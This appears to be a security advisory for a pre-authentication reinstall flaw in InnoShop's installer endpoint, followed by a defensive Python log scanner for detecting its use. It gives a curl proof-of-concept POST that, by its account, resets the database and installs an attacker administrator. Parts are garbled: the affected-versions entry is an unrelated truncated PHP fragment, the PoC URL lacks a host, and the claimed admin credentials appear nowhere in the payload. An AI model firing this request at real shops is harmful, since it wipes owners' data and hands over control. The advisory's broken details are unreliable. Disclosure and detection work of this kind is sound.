### Vulnerability Overview

**Title**: [Security] Pre-auth Application Reinstall leads to full system takeover #314

**Type**: Critical pre-authentication vulnerability

**Description**: The installation module (`inno packs/install`) of InnoShop contains a severe vulnerability. After the application is fully installed, the `/install/complete` endpoint remains accessible without any authentication or CSRF protection. An unauthenticated attacker can send a single POST request to overwrite the `.env` file, wipe the entire database via `migrate:fresh`, and create a new administrator account, thereby achieving complete system takeover.

### Impact Scope

* **Affected Versions**: InnoShop

```php
loadRoutesFrom(__DIR__.'/routes/web.php');
$this->loadViewsFrom(__DIR__.'/resources/views', 'install');
$this->loadTranslationsFrom(__DIR__.'/lang', 'install');
}
```

### POC Code / Exploit Code

The advisory provides a complete `curl` command as a Proof of Concept (PoC), which is sufficient to exploit this vulnerability:

```bash
curl -X POST "http:///install/complete" \
  -H "Content-Type: application/x-www-form-urlencoded" \
  -d "db_type=mysql&db_host_name=DB_HOST&db_port=3306&db_name=DB_NAME&db_username=DB_USER&db_password=DB_PASSWORD"
```

**Expected Result**: HTTP 200, returning `{"success": true, ...}`. The attacker can subsequently log in to `/panel` using the injected credentials.
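
A detection example for the request described above, added here and not taken from the advisory or the InnoShop project: it scans web-server access logs for requests to the installer routes on an already-installed shop and separates POSTs to `/install/complete` that returned 2xx from those that failed. It assumes the combined access-log format; the sample log lines, labels and function names are constructed for illustration.

```python
import re

# Constructed sample lines in the "combined" access-log format (not real traffic).
SAMPLE_LOG = """\
203.0.113.7 - - [12/Mar/2025:10:01:02 +0000] "GET /install HTTP/1.1" 200 5120 "-" "curl/8.5.0"
203.0.113.7 - - [12/Mar/2025:10:01:05 +0000] "POST /install/complete HTTP/1.1" 200 87 "-" "curl/8.5.0"
198.51.100.4 - - [12/Mar/2025:10:02:11 +0000] "POST /install/complete?x=1 HTTP/1.1" 404 153 "-" "Mozilla/5.0"
192.0.2.10 - - [12/Mar/2025:10:03:00 +0000] "GET /panel/login HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
192.0.2.10 - - [12/Mar/2025:10:03:09 +0000] "POST /panel/login HTTP/1.1" 302 0 "-" "Mozilla/5.0"
"""

# Client IP, timestamp, method, request target and status from one log line.
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)

def classify(method, path, status):
    """Return a label for an installer-route request, or None if unrelated."""
    if not (path == "/install" or path.startswith("/install/")):
        return None
    if method == "POST" and path.rstrip("/") == "/install/complete":
        # A 2xx answer means the installer ran: treat it as a likely reinstall.
        return "reinstall-succeeded" if 200 <= status < 300 else "reinstall-attempt"
    return "installer-access"

def scan(log_text):
    """Return (label, ip, timestamp, method, path, status) per installer hit."""
    findings = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # line is not in the assumed format
        path = m["target"].split("?", 1)[0]  # ignore the query string
        label = classify(m["method"], path, int(m["status"]))
        if label:
            findings.append((label, m["ip"], m["ts"], m["method"], path, int(m["status"])))
    return findings

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(*finding)
```

On a production shop any `reinstall-succeeded` hit warrants checking `.env`, the database contents and the administrator accounts against known-good state.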